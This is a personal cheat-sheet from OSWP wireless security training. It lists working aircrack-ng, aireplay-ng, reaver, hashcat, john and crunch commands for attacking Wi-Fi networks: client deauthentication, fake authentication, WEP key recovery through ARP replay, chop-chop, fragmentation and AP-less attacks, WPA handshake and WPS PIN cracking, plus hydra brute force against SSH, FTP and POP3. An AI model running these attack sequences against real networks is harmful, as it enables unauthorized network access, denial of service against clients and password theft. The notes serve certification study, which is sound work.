LinkedinGithub

Wireless Attacks

My notes on wireless attacks I made during my OSWP training

Connecting to an Access Point

Change between monitor and manage mode

Monitor mode

airmon-ng

airmon-ng start wlan0

Manually

# Use the following command to set interface in monitor mode.
iw dev <interface> set monitor none

# If this gives you device busy error, then do the following:
ifconfig <interface> down
iw dev <interface> set monitor none
ifconfig <interface> up

Managed mode

Needed for connecting to networks!!!

airmon-ng

sudo airmon-ng stop wlan0mon

Manually

ifconfig mon0 down
ifconfig mon0 mode managed
ifconfig mon0 up

We can also disconnect and reconnect the adapter. With iwconfig we can see the mode of the interface.

To connect to a network we need to reestart NetworkManager, if we killed it previously with airmon-ng check killsudo service NetworkManager start

If the network uses mac filtering we cannot connect. It can be blacklist or whitelist. If it's blacklist we can use any non blacklisted MAC. If it's whitelisted we need to use the MAC of a connected client. A symptom of MAC filtering is that the network is OPEN or we have a password and still can't connect

sometimes changed macs don't stay when trying to connect to the network

wpa_supplicant -> Client to connect to wifi networks

IMPORTANT, indent what's insde braces or it will fail (parsing error). If tabs fail, add a couple of whitespaces instead

IMPORTANT, if wpa_supplicant is connected via an interface to a network it cannot connect to another, search ps aux for wpa_supplicant processes and kill them before connecting to another network or with a different configuration

several interfaces of wpa_supplicant can be run in parallel for different interfaces with different configurations

  • scan_ssid -> send probe requests

Config file for open network

network={
  ssid="<ESSID>"
  scan_ssid=1
}

alternative:

network={
  ssid="<ESSID>"
  scan_ssid=1
  mode=0
  auth_alg=OPEN
  key_mgmt=NONE
}

Config file for WEP network

If we have a hex key, dont use quotation marks " and don't use : to separate bytes (the next two examples are equivalent, one with ASCII key and the other with hex key)

network={
  ssid="<ESSID>"
  key_mgmt=NONE
  wep_key0="34567"
  wep_tx_keyidx=0
}
network={
  ssid="<ESSID>"
  key_mgmt=NONE
  wep_key0=0304050607
  wep_tx_keyidx=0
}

alternative

network={
  ssid="<ESSID>"
  scan_ssid=1
  mode=0
  auth_alg=OPEN
  key_mgmt=NONE
  wep_key0=0304050607
}

Config file for WPA-PSK network

Valid for WPA-PSK and WPA2-PSK

network={
  ssid="<ESSID>"
  scan_ssid=1
  psk="<passphrase>"
  key_mgmt=WPA-PSK
}

alternative

network={
  ssid="<ESSID>"
  mode=0
  scan_ssid=1
  auth_alg=OPEN
  key_mgmt=WPA-PSK
  proto=WPA
  pairwise=TKIP
  group=TKIP
  psk="<passphrase>"
  
}

Specific config file for WPA2-PSK

but WPA2-PSK (only) can be specified like this also:

wpa_supplicant will automatically choose between TKIP and CCMP based on availability, but it is possible to force one or the other by adding pairwise=CCMP or pairwise=TKIP to the configuration if necessary.

network={
  ssid="<ESSID>"
  key_mgmt=WPA_PSK
  psk="<passphrase>"
  proto=RSN
  pairwise=CCMP
  group=CCMP
}

# less specific, can work better
network={
  ssid="<ESSID>"
  key_mgmt=WPA_PSK
  psk="<passphrase>"
  proto=RSN
}

# or maybe this is necessary, due to retrocompatibility with old devices
network={
  ssid="<ESSID>"
  key_mgmt=WPA_PSK
  psk="<passphrase>"
  proto=WPA
  pairwise=CCMP
  group=CCMP
}

  • RSN -> Robust Secure Network (this sets pairwise and group to CCMP, although it can be specified explicitely so that we are not downgraded in any case). Maybe specifying pairwise and/or group fails, don't specify them first

alternative:

network={
  ssid="<ESSID>"
  scan_ssid=1
  mode=0
  auth_alg=OPEN
  key_mgmt=WPA_PSK
  psk="<passphrase>"
  proto=RSN
  pairwise=CCMP
  group=CCMP
}

WPA-Enterprise

PEAP-MSCHAPv2 authentication

network={
  ssid="<ESSID>"
  scan_ssid=1
  key_mgmt=WPA-EAP
  eap=PEAP
  identity="bob"
  password="hello"
  phase1="peaplabel=0"
  phase2="auth=MSCHAPV2"
}

PEAP-GTC WPA Supplicant Configuration

  network={
  ssid="<ESSID>"
  scan_ssid=1
  key_mgmt=WPA-EAP
  eap=PEAP
  identity="bob"
  password="hello"
  phase1="peaplabel=0"
  phase2="auth=GTC"
}

TTLS-PAP WPA Supplicant Configuration

network={
  ssid="<ESSID>"
  scan_ssid=1
  key_mgmt=WPA-EAP
  eap=TTLS
  identity="bob"
  anonymous_identity="anon"
  password="hello"
  phase2="auth=PAP"
}

TTLS-CHAP WPA Supplicant Configuration

network={
  ssid="<ESSID>"
  scan_ssid=1
  key_mgmt=WPA-EAP
  eap=TTLS
  identity="bob"
  anonymous_identity="anon"
  password="hello"
  phase2="auth=CHAP"
}

TTLS-MSCHAPv2 WPA Supplicant Configuration

network={
  ssid="<ESSID>"
  scan_ssid=1
  key_mgmt=WPA-EAP
  eap=TTLS
  identity="bob"
  anonymous_identity="anon"
  password="hello"
  phase2="auth=MSCHAPV2"
}

Tool to generate configuration files: wpa_passphrase. Mandatory parameter: ESSID. Optional parameter: passphrase

Connect to a network with wpa_supplicant and config file

  • -i -> interface used to connect

  • -c -> config file

  • -B -> run wpa_supplicant in the background

sudo wpa_supplicant -i wlan0 -c wifi-client.conf

# sometimes the driver that wpa_supplican uses is specified (different from the driver used for the wifi interface)
sudo wpa_supplicant -Dnl80211 -i wlan0 -c wifi-client.conf

# request an ip by dhcp, once we are connected to an AP
dhclient -v wlan0

Manual connection

sudo /sbin/ifconfig wlan0 up
sudo /sbin/iwlist wlan0 scan
sudo /sbin/iwconfig wlan0 essid "NetworkName"
sudo /sbin/iwconfig wlan0 key network_key
sudo /sbin/iwconfig wlan0 enc on

To get an IP after connecting to the AP: dhclient -v wlan0

alternative method:

sudo iwconfig wlan0 essid <SSID> key s:<KEY>
sudo dhclient -v wlan0

Change MAC address

Manually:

ifconfig wlan0 down
ifconfig wlan0 hw ether <new MAC>
ifconfig wlan0 up

Mac-changer:

# for specified mac
sudo macchanger -m <valid MAC> wlan0

# for random mac
sudo macchanger -r wlan0

Change Wifi band

for 5 GHzairodump-ng --band a wlan0mon For both 5 and 2.4 GHz:airodump-ng --band abg wlan0mon

Wifi bands

  • Decide which ranges of freqs can be used

  • Determine the channels that can be used

  • Clients must support the band used by the AP to connect to it or sniff traffic Most common bands:

  • a, only 5 GHz -> seems like scanning with airodump on band a can pick up 2.4 GHz APs too

  • b, g, only 2.4 GHz

  • n, both 5 and 2.4 GHz

  • ac, freqs lower than 6 GHz

Channel bonding: sometimes several channels are combined into one, used to avoid interferences between channels. 802.11 n - compatible networks means that they support channel bonding.

In 5 GHz there is no overlapping in frequency between adjacent channels, that increases throughput. In 2.4 GHz there is.

When a client sends the others cannot. For that is good to have low power APs, to avoid many clients connecting to the same AP and one of them takes over.

Other commands

# devices connected by usb
sudo lsusb -vv

# physical properties of wifi interfaces (support of a card for monitor mode can be found)
iw dev
iw phy
iw list

# view regional settings. If some channel says PASSIVE-SCAN, it is listening but not sending packets
iw reg get

# change regulatory domain settings
iw reg set <country code>

# if iw phy says no IR (IR=initial radiation) that channel is not used in the configured country. We can also check if a channel can be used by checking if packets arrive when we do:
iw dev wlan0 set channel 13
aireplay-ng --test wlan0

# change channel width (for channel bonding, although management frames have always a standard width of 20 MHz)
iw dev wlan0 set channel 6 HT40+
iw dev wlan0 set channel 36 80MHz

# Scan networks without airodump
iw dev wlan0 scan
iw dev wlan0 scan |grep "SSID:"

# Connect to an open SSID
iwconfig wlan0 essid <essid>

Common mistakes:

  • interface

    • make sure it is up (ifconfig wlan0 up)

    • make sure it is the correct mode (iw dev)

  • sniffing

    • sniff in all frequencies: (a, b/g)

    • use proper channel width, if there is channel bonding

Hidden networks

Hidden networks don't advertise their name (ESSID) but they advertise their presence (BSSID). This is enough for us to not be able to connect or try to crack their pass, or try to launch attacks against it. Airodump only shows the name length, but not its value. In windows we see "hidden network" and it asks for the name when we try to connect

If a network has hidden ESSID the first step is to ALWAYS try to find it. If there are clients connected we can deauth one of them and we will capture the name when he reconnects. If there are no connected clients try a dictionary attack, trying to connect to a network using different names from a dictionary

Non probing clients are clients which are there, but don't probe networks, therefore we cannot detect their presence. We can create fake APs to see if he connects to any of them.

others

Several APs with different BSSID can share the same ESSID (this is, a single network with several access points)

The radiotap header that wireshark shows is added by wireshark, that information is not in packets sent through the air

Types of frames (for attacks, data frames are the important ones)

  • Management (advertisement, discovery, connection/disconnection)

  • Control (to facilitate delivery of Management and Data frames)

  • Data

WDS -> wireless distribution system: provide internet access from one wifi router to another via wifi (not by cable), so that the second one can cover a zone where the signal of the first doesn't reach

Beacon flood attack: fill the air with fake beacons so that clients see a lot of APs and the ones they want to see may fall out of the list mdk4 wlan0 b

  • Some wireless drivers ignore directed deauthentication and only respond to broadcast deauthentication. We can run the same aireplay-ng deauthentication command without the -c parameter.

  • If 802.11w is in use, unencrypted deauthentication frames are ignored. The only course of action is to wait for a client to connect.

  • The device simply didn't reconnect or was already out of range of the AP.

wigle.net -> geographical location of BSSIDs

Some phones randomize their MAC until the moment they connect to a network, when they switch to the good one. If we setup a honeypot we can get their real MAC if they connect to us

airmon-ng

# List interfaces
sudo airmon-ng  

# List programs that can interfere with aircrack-ng suite
sudo airmon-ng check 

# Kill processes that can interfere with aircrack-ng suite
sudo airmon-ng check kill

# Create an interface (wlan0mon) in monitor mode from an existing one (wlan0)
sudo airmon-ng start wlan0

# Stop monitor mode
sudo airmon-ng stop wlan0mon

# Start monitor mode only on channel 2 (only do this when the tool that will be used next doesn't change channels itself)
sudo airmon-ng start wlan0 2

# manually set channel
iw dev wlan0 set channel 13

# Check that we changed the channel correctly
sudo iw dev wlan0mon info

# verbose and debug mode
sudo airmon-ng --verbose
sudo airmon-ng --debug

Even if we don't see connected clients, send deauth packets against the different networks, with airodump listening in the specific channel (so that we don't miss reauth attempts if we are scanning other channels at that moment)

airodump-ng

# Specify the channel where airodump listens
airodump-ng --channel 11 --bssid <bssid>

# listen to a single bssid and write output to a file (it creates several files with different formats)
airodump-ng --channel 11 --bssid <bssid> --write <file name>

# scan both 2.4 and 5 GHz simultaneously
airodump-ng wlan0 --band abg

# load capture file in airodump
airodump-ng -r <file.cap>

# show WPS status for WPA networks
airodump-ng wlan0 --wps

aireplay-ng

# deauth a client (1000000 is a large number of packets, to keep the deauth attack working for a while):
sudo aireplay-ng --deauth 4 -a <bssid> -c <client_MAC> wlan0mon

# To background the command and don't see output
sudo aireplay-ng --deauth 4 -a <bssid> -c <client_MAC> wlan0mon &> /dev/null &

# with "jobs" we can see the jobs backgrounded with &. each has an ID
jobs

# kill all backgrounded aireplay processes.
killall aireplay-ng 

# kill only the first process in the "jobs" list:
kill %1

# To deauth every client connected to a BSSID don't specify a client <MAC>
aireplay-ng --deauth 4 -a <bssid> wlan0mon &> /dev/null &

# check if we can inject in visible APs
sudo aireplay-ng -9 wlan0mon 

# check if we can inject in a specific AP
sudo aireplay-ng -e <ap_name> -a <MAC> wlan0mon

# Same as above, but without expecting to receive probes
sudo aireplay-ng -e <ap_name> -a <MAC> -D wlan0mon

# if we have two wifi cards, wlan0mon and wlan1mon, card-to-card test, to make sure they can inject. if it says (5/7 error, still can be used to attack an AP)
sudo aireplay-ng -9 -i wlan1mon wlan0mon

Sometimes aireplay-ng says that he can't find the BSSID, that's because it's not using the appropriate channel. For that, run airodump-ng in the appropriate channel before aireplay-ng, or set the channel with "iw dev wlan0 set channel 13"

airdecap-ng

# Keep the packets targeted to a specific <BSSID> and remove the rest from a cap file (creates a new file)
airdecap-ng -b <MAC> file.pcap

# decrypt saved traffic with a passphrase (check that the passphrase works, we may capture failed logins)
airdecap-ng -b <bssid> -e <essid> -p <pass> file.pcap

aircrack-ng

#benchmark (dice k/s, que es el numero de palabras por segundo que puede crackear)
aircrack-ng -S  

# DON'T use a dictionary for WEP files!!!!
aircrack-ng wep.cap

# crack a handshake saved in a cap file:
aircrack-ng -w <path to wordlist> -e <ESSID> -b <ap bssid> file.pcap
aircrack-ng -w /usr/share/john/password.lst -e <ESSID> -b <ap bssid> file.cap

#crack using a db created with airolib (precomputed PMKs)
aircrack-ng -r wifu.sqlite wpa1-01.cap

If in a capture file an AP has hidden name but we find it in another way, we need to pass both arguments to aircrack-ng, -b and -e, so that it can match a BSSID to an ESSID

airgraph-ng

Creates graphs of APs and stations. Colors:

  • green -> WPA

  • yellow -> WEP

  • red -> open

  • black -> desconocido el cifrado

#CAPR: client to access point relationship. Provide a csv captured by airodump
airgraph-ng -i dump.csv -o file.png -g CAPR

# CPG: client probe graph -> shows relations (connections) from clients to APs
airgraph-ng -i dump.csv -o file.png -g CPG

airolib-ng

manages password lists in SQLite (calculating pairwise master key (PMK) is slow, but it is constant for an AP. precomputing it saves time later).

# create a text file containing the ESSID of the target AP
echo wifu > essid.txt

# import the text file into an airolib-ng database
airolib-ng wifu.sqlite --import essid essid.txt

# info about database (ESSIDs and stored passwords)
airolib-ng wifu.sqlite --stats

# import a dictionary of passwords (ignores those shorter than 8 chars and larger than 63 chars, since they are not valid WPA passphrases)
airolib-ng wifu.sqlite --import passwd /usr/share/john/password.lst

# calculate the PMK corresponding to each inported password
airolib-ng wifu.sqlite --batch

#crack using a db
aircrack-ng -r wifu.sqlite wpa1-01.cap

wifi bands

  • a, only 5 GHz -> seems like scanning with airodump on band a can pick up 2.4 GHz APs too

  • b, g, only 2.4 GHz

  • n, both 5 and 2.4 GHz

  • ac, freqs lower than 6 GHz

WEP (wireless equivalent privacy)

SKA = shared key authentication (ver si sale en PA al intentar auth wep) [[4 - WEP#WEP SKA]]ICV = integrity value check (CRC)WEP cloaking = the AP injects fake wep packets to difficult crackingKeystream (created by RC4 from IV + key)

WPA/WPA2

PSK = pre shared key (what the client enters to connect)PTK = pairwise transient keyPMK = pairwise master key (dynamic key generated in handshake using PBKDF2 (password based key derivation function 2)) - If there is a PSK, the PMK is the PSK - A PSK is either a 256-bit key or derived from a passphrase - If a passphrase is used, it generates the PSK using the AP SSID as the salt: PSK = PBKDF2(HMAC−SHA1, Passphrase, SSID, 4096, 256) - If there is no PSK, the PMK is derived using 802.1x EAP exchange, usually RADIUSGTK = group transient key (used when messages like ARP are sent to many people, everyone needs to decrypt it equally)WPS = wifi protected setup (Tools: wash, reaver, bully)PBC = push button configuration Encryption mechanismsTKIP (based on WEP, which uses RC4, xor, etc)CCMP (based on AES)

  • The 4-way handshake does the following:

    • Confirm the client’s knowledge of the PMK

    • Confirm the AP's knowledge of the PMK

    • Derive a new and unique PTK

    • Install encryption and integrity keys

    • Encrypt transport of the AP generated GTK to the client

    • Confirm cipher suite selection

  • The PMK, nonces, and handshake MAC addresses are run through a PRF based on HMAC-SHA1 to derive the 512-bit PTK. During the handshake the AP also transmits the 256-bit GTK, or Group Temporal Key, to the client. The PTK and GTK are split into several components, some of which are used as AES keys for different types of network traffic, and some of which are integrity keys.

    • KCK = PTK bits 0-127, the key confirmation key

    • KEK = PTK bits 128-255, the key encryption key

    • TEK = PTK bits 256-383, the temporal encryption key for unicast traffic

    • TMK = PTK bits 384-511, the temporal MIC keys for TKIP

    • GEK = GTK bits 0-127, the group encryption key for multicast traffic

    • GIK = GTK bits 128-255, the group integrity key for TKIP

WPA enterprise

EAP = extended authentication protocol -> authenticate with RADIUS server (in airodump AUTH=MGT). Requires certificates on the server at least (deprecated EAP methods didn't require them)

EAP Transport Layer Security (EAP-TLS) is one of the most secure authentication methods, as it uses certificates on the server side and client side, instead of login and passwords, so the client and server mutually authenticate each other.EAPoL=extended authentication protocol over lan Identity = username Authentication methods: - EAP-MD5 (vulnerable to brute force, tool: eapmd5pass) - EAP-PAP - EAP-GTC - EAP-CHAP - EAP-MSCHAPv2 Encapsulations - PEAP - Protected Extensible Authentication Protocol(tunnel between client and RADIUS server, the AP sees nothing). creates a TLS tunnel before credentials are exchanged. Although different methods can be used within PEAP, MS-CHAPv2 is a commonly used inner method. PEAP and EAP-TLS mostly differ on how the data is exchanged inside the TLS tunnel. - EAP-TTLS - EAP Tunneled Transport Layer Security. also uses TLS. As opposed to EAP-TLS, it does not necessarily need client certificates. It creates a tunnel and then exchanges the credentials using one of the few possible different inner methods (also called phase 2), such as Challenge-Handshake Authentication Protocol (CHAP), Authentication Protocol (PAP), Microsoft CHAP (MS-CHAP), or MS-CHAPv2.

OWE (opportunistic wireless encryption)

encrypt traffic during a connection, to prevent eavesdropping of credential exchange

SAE (simultaneous authentication of equals)

enhanced version of diffie helmann where no pre shared key is necessary

Default credentials

First of all, if we know the AP model, check for default credentials. The first half of the BSSID can help: https://www.wireshark.org/tools/oui-lookup.html

Online cracking

# hydra ssh
hydra -t 4 -l root -P /root/wordlists/100-common-passwords.txt ssh://192.105.16.4

# hydra ftp
hydra -t 3 -l root -P /root/wordlists/100-common-passwords.txt ftp://192.105.16.4

# POP3
hydra -L login.txt -P passwords.txt -V 192.168.50.128 -s 110 -t 2 pop3

Offline Cracking

Hashcat

  • The hashcat module to crack WPA/WPA2 is 2500

  • We can pause (p) and resume (r) the hashcat execution

# info about cracking hardware
hashcat -I 

# benchmark of all hash types (very slow)
hashcat -b

# benchmark a single hash type
hashcat -b -m 2500

# extract hashes from a cap file
cap2hccapx.bin file.cap output.hccapx

# crack
hashcat -m 2500 out.hccapx >wordlist>

# with -d we can choose the cracking device of the listed ones
hashcat64 -m 2500 -d 1 <pcap file> <wordlist>

# with --pot-file we can indicate another path to save the pot file

# install hashcat utilities (found in /usr/lib/hashcat-utils)
sudo apt install hashcat-utils

# convert PCAP file to HCCAPx file with a hashcat util
/usr/lib/hashcat-utils/cap2hccapx.bin wifu-01.cap output.hccapx

Hashcat modules

type
module
example

WPA-EAPOL-PBKDF2

-m 2500

WPA-EAPOL-PMK

-m 2501

WPA-PMKID-PBKDF2

-m 16800

WPA-PMKID-PMK

-m 16801

2582a8281bf9d4308d6f5731d0e61c614604ba734d4e89acf0e761f4

TTLS-CHAP

-m 4800

ce8d3c0b4c5c9369ce426ba7d36d164e:38ddb29b0fea9243afb6fb9d6bb95bfb:2a

TTLS-MSCHAPv2

-m 5500

user1::::f4ed9fe147deaed3bfb1a1744ce1908788c66d281b134a11:d98dd4b772ee831c

Password mutation

John

The rules to mutate passwords are in /etc/john/john.conf

  • Rule to add 2 and 3 numbers at the end of the password:

$[0-9]$[0-9]
$[0-9]$[0-9]$[0-9]

Use --rules with john to apply rules

# See the wordlist in screen
john --wordlist=<wordlist file> --stdout

# We can see the variations that will be applied and see if password123 is generated
sudo john --wordlist=<path to wordlist> --rules --stdout |grep -i password123

# With --session the session is saved and can be restored the next time it is resumed from the last password tried 
john --wordlist=<wordlist file> --stdout --session=<session name> | aircrack-ng -w - -b <AP BSSID> <file.cap>

# We can stop it with "q" or "ctrl-c", and continue later from that point
john --restore=<session name> | aircrack-ng -w - -b <AP BSSID> <file.cap>

# We can pipe mutations to aircrack without saving to disk with "-w -" :
sudo john --wordlist=<wordlist> --rules --stdout | aircrack-ng -e wifu -w - <file.pcap>

# We can save and restore sessions also with wordlists generated on the fly with crunch 
crunch 8 8 | john --stdin --session=<session name> --stdout | aircrack-ng -w - -b <AP BSSID> <file.cap>

# and later restore with
crunch 8 8 | john --restore=<session name> | aircrack-ng -w - -b <AP BSSID> <file.cap>

Crunch

Generate new passwords, we need to say the minimum and maximum length (WPA requires passphrases between 8 and 63 chars). Crunch also allows us to specify a pattern with the -t option with or without a character set. Different symbols in the pattern define the type of character to use.

  • @ represents lowercase characters or characters from a defined set

  • , represents uppercase characters

  • % represent numbers

  • ^ represents symbols

# Create all combinations of words from 8 to 9 characters (a lot of output, not practical)
crunch 8 9

# Crate all combinations of words from 8 to 9 characters using only the characters: a,b,c,1,2 and 3:
crunch 8 9 abc123

# Create combinations of 11 chars formed by the word "Password" and 3 numbers
crunch 11 11 Password%%%

# equivalent:
crunch 11 11 0123456789 -t password@@@

# generate unique combinations from a set (in this case the min and max lengths are ignored but we need to provide them so that the program doesn't fail)
crunch 1 1 -p abcdefg1234

# Generate unique words from some words (it combines them)
crunch 1 1 -p january february march

# Generate patterns with the words we say (they are replaced in the "d")
crunch 5 5 -t ddd%% -p january february march

# If instead of the % we use @ crunch adds lowercase letters instead of numbers

# it replaces the letters "aADE" in the @@ and the words in the "d" letters
crunch 5 5 aADE -t ddd@@ -p january february march

# pipe output from crunch to aircrack:
crunch 5 5 aADE -t ddd@@ -p january february march | aircrack-ng -e wifu file.pcap -w -

Mangler

Ruby script to mutate passwords --allow-duplicates is usually worth it because of the time we save in not checking if there are duplicates

# Mutate words of a file
rsmangler --file file.txt
cat file.txt | rsmangler --file -

# Limit the size of the generated words
rsmangler --file wordlist.txt --min 12 --max 13

# Pipe to aircrack (don't use --output, that is only to save to disk)
rsmangler --file wordlist.txt --min 12 --max 13 | aircrack-ng -e wifu file.pcap -w -

A set of three words generates about 6,000 passwords, four words generates about 23,000 passwords, and five words generates about 125,000 passwords. We need to take care to ensure the wordlist we begin with is a reasonable size.

coWPAtty

Tool that recovers WPA pre-shared keys using both dictionary and rainbow table attacks. Although coWPAtty is not being developed anymore, it is still useful, especially when using its rainbow table attack method. Install it with sudo apt install cowpatty

#Generate rainbow tables
genpmk -f <password file> -d hashes -s test

cowpatty -r wpa-01.pcap -d hashes -s test

extra WEP

Automatic tool. It sends packets to the WEP network that we are trying to attack. It may be necessary to run this command several times, sometimes it fails.

besside-ng wlan0 -c 6 -b <BSSID>

wordlists

ftp://ftp.openwall.com/pub/wordlists/ http://www.openwall.com/mirrors/ https://github.com/danielmiessler/SecLists http://www.outpost9.com/files/WordLists.html http://www.vulnerabilityassessment.co.uk/passwords.htm http://packetstormsecurity.org/Crackers/wordlists/ http://www.ai.uga.edu/ftplib/natural-language/moby/ http://www.cotse.com/tools/wordlists1.htm http://www.cotse.com/tools/wordlists2.htm http://wordlist.sourceforge.net/

WEP

CRC-32 is a digest, just like MD5

An attacker can sniff packets, where the IV (24 bit) is in plain text. since 24 bit is not much, capturing enough packets, statistical attacks can be run. RC4 generates the same keystring for a same IV+key. #Data in airodump shows how many useful packets have been captured. When enough are present we can crack it with:aircrack-ng archivo.cap

Sometimes aircrack doesn't return the ascii version of the key but we can connect to the network with the hex (without the ":" ).

If not many clients are connected we can force the AP to send us traffic. We first need to associate with it (otherwise it ignores our requests), then we can send packets and capture the IVs in the packets it returns to us.

For this, keep saving packets:sudo airodump-ng --bssid <bssid> --channel <channel> --write out wlan0mon

and do a fake auth (the 0 indicates that the attack is done once):sudo aireplay-ng --fakeauth 0 -a <AP bssid> -h <la MAC de wlan0mon> wlan0mon

In monitor mode, with ifconfig we see unspec instead of ether and the MAC looks longer, we need only the first 6 bytes:and for aireplay commands replace - by :

At this point we are only associated to the AP, not connected to it. There are several methods to generate traffic:

Crafted ARP packets

Wait till there is an ARP packet (sent by the clients already connected to the network). They will be encrypted but because of their length we know they can be ARP. We just relay them to the AP. The AP will respond to us with another packet with a new IV. We do this until we have enough IVs. To do this (just befor this command run the --fakeauth just in case) It is necessary to use a target client MAC with -h, the MAC of a client that is already connected to the network and sends valid IVssudo aireplay-ng --arpreplay -b <AP bssid> -h <target client MAC> wlan0mon

The -a used in other commands is replaced by -b for the BSSID and the --arpreplay doesn't have any number afterward This captures packets until one of them is an ARP request, and then starts to generate traffic. Watch with airodump who many useful packets we have in #Data.

to capture useful ARP packets we either need to be associated with the AP (fakeauth) or use with aireplay-ng arpreplay the MAC of an associated client

Depending on the key length (64 or 128) bit it takes more IVs to crack the key

Stealthy sniffing

Just waiting for clients to send a lot of IVs to the AP can take a lot of time but it's stealty

Chop chop attack

Instead of replaying an ARP packet we determine the keystream of a packet, we craft a new packet with the keystream and inject it to the AP. The AP will respond with a new IV that we will replay, etc. Can be used when no clients are connected to the AP

The --fakeauth attack is only used against OPEN and WEP networks, it doesn't work against WPA/WPA2. Fake auth doesn't generate ARP packets. The lack of association with the access point is the biggest reason why injection fails, so we need to do fakeauth before trying to inject packets to WEP networks (ARP replay, chopchop, fragmentation attack). Sometimes you periodically get disassociation events. Some access points require to reassociate every 30 seconds, otherwise the fake client is considered disconnected. In this case, setup the periodic re-association delay:

aireplay-ng -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

If fake authentication is never successful (aireplay-ng keeps sending authentication requests) then MAC address filtering may be in place

more info and troubleshooting in: https://www.aircrack-ng.org/doku.php?id=fake_authentication

# We first start airodump to capture packets and save them to a file
sudo airodump-ng --bssid <bssid> --channel <channel> --write out wlan0mon

# Then we do fake auth with aireplay to associate to the AP (run just before the chop chop attack). We can get our MAC with ifconfig wlan0
sudo aireplay-ng --fakeauth 0 -a <AP bssid> -h <our wlan0mon MAC that we want to associate> wlan0mon

# chop chop attack (waits for beacons from AP to try to determine keystream from them)
sudo aireplay-ng --chopchop -b <AP bssid> -h <our wlan0mon MAC> wlan0mon

# When it finds an ARP packet it asks if we want to use it. say "y". After a while it saves the keystream in a xor file. We can do ctrl-C to not wait much, but the saved keystream may fail. If so, keep the chop chop working for longer.

# After that, forge an ARP packet (-0 option)
packetforge-ng -0 -a <bssid> -h <our wlan0mon MAC address> -k 255.255.255.255 -l 255.255.255.255 -y <file.xor> -w <forged packet name>
# -k is destination IP (use 255.255.255.255)
# -l is source IP (use 255.255.255.255)
# <forged packet name> can be anything, it's the name of the forged packet

# having done --deauth again, use the forged packet:
sudo aireplay-ng -2 -r <forged packet name> wlan0mon
# -2 is for replaying
# it asks again if we want to use the packet. say "y", this starts to generate traffic that airodump caputres

fragmentation attack

Similar to chop chop but we need to obtain 1500 bytes from the pseudo random generator algorithm (PRGA). With this attack another packet is forged, but it's faster than chop chop, although we need to be physically close to the AP so that it works better.

# Start saving packets
sudo airodump-ng --bssid <bssid> --channel <channel> --write out wlan0mon

# fake auth (the 0 instructs to do the attack once)
sudo aireplay-ng --fakeauth 0 -a <AP bssid> -h <our wlan0mon MAC> wlan0mon

# Obtain PRGA
aireplay-ng --fragment -b <bssid> -h <our wlan0mon MAC> wlan0mon

# Say "y" when asked. It may fail several times and ask us if we want to use another. say "y" always. When one of the packets is useful it lets us know and saves the keystream in a .xor file

# forge a new packet (with -0 it creates an ARP packet)
packetforge-ng -0 -a <bssid> -h <nuestra mac de wlan0mon> -k 255.255.255.255 -l 255.255.255.255 -y <xor file> -w <output>

# inject the forged packet (remember to do fake auth just before this)
sudo aireplay-ng -2 -r <forged packet name> wlan0mon

WEP SKA

Normally when we do fake auth with aireplay-ng to a WEP network we can see it becomes OPN, but some routers allow to configure Shared Key Authentication (SKA), which prevents that no one without that key can associate to the AP (unlike in OPEN networks, where anyone can associate). In networks with SKA set up we will see SKA after doing fake auth.

It is possible to deauthenticate a connected client, and capture the SKA when he reconnects. With this key we can associate to the AP and try the previous attacks to recover the WEP key.

We can also inject an ARP packet using the MAC address of the client which is already connected to the AP. With this we can generate traffic to recover IVs and still crack the WEP password, despite not having the SKA.

sudo aireplay-ng --arpreplay -b <AP bssid> -h <MAC of a connected client> wlan0mon

The 802.11w standard protects against deauth attacks, buth must be supported by both the client and the AP

When we have cracked a WEP or WPA key we can decrypt captured traffic in wireshark:

preferences > protocols > IEEE 802.11, check "enable decryption", edit the decryption keys y create new entries. For WEP, use the key in hex format.`

If we don't have wireshark we can do:

airdecap-ng -w <wep key in hex> <pcap>
tshark -r <decrypted pcap>

AP-less attacks: Caffe latte attack

We can craft packets by modifying the ICV (integrity check value, that is, a CRC) and the plantext of a message and do so in a way that the AP thinks that the message is legitimate.

With this we can modify a Gratuitous ARP packet and change it to an ARP request packet, to repeat the ARP attack

Client devices store the keys of the networks they already connected to in the past. If we create a fake AP that looks like on of the stored APs in the client PNL, he will connect to us and send WEP-encrypted data with the target AP key. Sometimes it sends also Gratuitous ARP packets, to say its IP and MAC In these messages we won't find the target MAC, and the target IP and sender IP are the same (that of the client). We as an AP send requests to the client, and he will return responses to us, from where we get valid IVs that can be cracked as always.

We don't have a valid WEP keys for the crafted packets, but due to the properties of XOR we can modify the packets that he sends us, and they will still be valid.

Hirte attack

AP-less attack

# create fake AP (-N for hirte attack)
airbase-ng -c 1 --essid "network1" -W 1 -N mon0

# capture packets
airodump-ng -c 1 mon0 --write Hirte

# wait for the client to connect, and ARP packets should start being replayed,

WEP cloacking

WEP protection in which fake packets are sent into the air to make it difficult to crack WEP (they try to difficult the statistical attacks)

WPA/WPA2

https://www.youtube.com/watch?v=Ra0dGPYScLQ

Before trying to crack WPA find out if WPS is enabled, which is easier to crack

WPS

Method to authenticate to WPA without the passphrase, only with a 8 character ping. It can be cracked faster because of its length, and once obtained, the WPA/WPA2 passphrase can be automatically recovered.

Requirements (hard to find nowadays)

  • WPS must be enabled

  • WPS must be using pin authentication and not PBC (Push Button Configuration). With option, a physical button in the router must be pushed to activate the use of WPS for some time interval. PBC usually is active by default in modern routers, or WPS is directly disabled by default.

# Find APs with WPS activated (exit with ctrl-C)
wash --interface wlan0mon  
wash -i wlan0mon  
# scan 5GHz band
wash -i wlan0mon -5
# The Lck column says if WPS is locked (sometimes WPS gets locked after some failed attempts). WPS version 2 includes mitigations against brute force, but depending on the implementation it may only slow it down.

# The next command brute forces WPS pins, online cracking similar to hydra (-vvv for verbose, --no-associate if we have previously associated with aireplay-ng --fakeauth)
reaver -b <AP bssid> -i wlan0mon -v
reaver --bssid <AP bssid> --channel <AP channel> --interface wlan0mon -vvv --no-associate

# Pixie attack (-K), faster than the regular brute force, but doesn't always work, depends on the AP PRGA 
reaver -b <AP BSSID> -i wlan0mon -v -K

# When the previous command is sent it stays waiting if we are not associated with the AP. We can do it with aireplay, so that the AP doesn't ignore the future packets that we will send (instead of 0 we can use a certain number of seconds to be associated)
sudo aireplay-ng --fakeauth 30 -a <AP bssid> -h <our own MAC> wlan0mon

Reaver outputs the WPS pin if it can find it, and thanks to it it also retrieves the passphrase (WPA-PSK), which we can use to connect to the network. Even if it finds it, it's an slow attack, it can take a few hours to complete, depending on the router AP configuration and the value of the pin (if it's one of the last ones reaver tries)

